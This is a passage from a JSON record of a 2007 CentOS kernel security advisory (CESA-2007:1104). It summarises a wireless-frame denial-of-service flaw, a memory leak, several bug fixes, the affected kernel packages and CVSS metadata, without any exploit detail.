issues:\r\n\r\nA flaw was found in the handling of IEEE 802.11 frames, which affected\r\nseveral wireless LAN modules. In certain situations, a remote attacker\r\ncould trigger this flaw by sending a malicious packet over a wireless\r\nnetwork, causing a denial of service (kernel crash).\r\n(CVE-2007-4997, Important)\r\n\r\nA memory leak was found in the Red Hat Content Accelerator kernel patch.\r\nA local user could use this flaw to cause a denial of service (memory\r\nexhaustion). (CVE-2007-5494, Important)\r\n\r\nAdditionally, the following bugs were fixed:\r\n\r\n* when running the \"ls -la\" command on an NFSv4 mount point, incorrect\r\nfile attributes, and outdated file size and timestamp information were\r\nreturned. As well, symbolic links may have been displayed as actual files.\r\n\r\n* a bug which caused the cmirror write path to appear deadlocked after a\r\nsuccessful recovery, which may have caused syncing to hang, has been\r\nresolved.\r\n\r\n* a kernel panic which occurred when manually configuring LCS interfaces on\r\nthe IBM S/390 has been resolved.\r\n\r\n* when running a 32-bit binary on a 64-bit system, it was possible to\r\nmmap page at address 0 without flag MAP_FIXED set. This has been\r\nresolved in these updated packages.\r\n\r\n* the Non-Maskable Interrupt (NMI) Watchdog did not increment the NMI\r\ninterrupt counter in \"/proc/interrupts\" on systems running an AMD Opteron\r\nCPU. This caused systems running NMI Watchdog to restart at regular\r\nintervals.\r\n\r\n* a bug which caused the diskdump utility to run very slowly on devices\r\nusing Fusion MPT has been resolved.\r\n\r\nAll users are advised to upgrade to these updated packages, which resolve\r\nthese issues.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2007-December/014549.html\nhttp://lists.centos.org/pipermail/centos-announce/2007-December/014550.html\nhttp://lists.centos.org/pipermail/centos-announce/2007-December/014551.html\nhttp://lists.centos.org/pipermail/centos-announce/2007-December/014553.html\n\n**Affected packages:**\nkernel\nkernel-devel\nkernel-doc\nkernel-hugemem\nkernel-hugemem-devel\nkernel-largesmp\nkernel-largesmp-devel\nkernel-smp\nkernel-smp-devel\nkernel-xenU\nkernel-xenU-devel\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2007-1104.html", "modified": "2007-12-22T14:17:20", "published": "2007-12-21T16:37:34", "href": "http://lists.centos.org/pipermail/centos-announce/2007-December/014549.html", "id": "CESA-2007:1104", "title": "kernel security update", "type": "centos", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}]}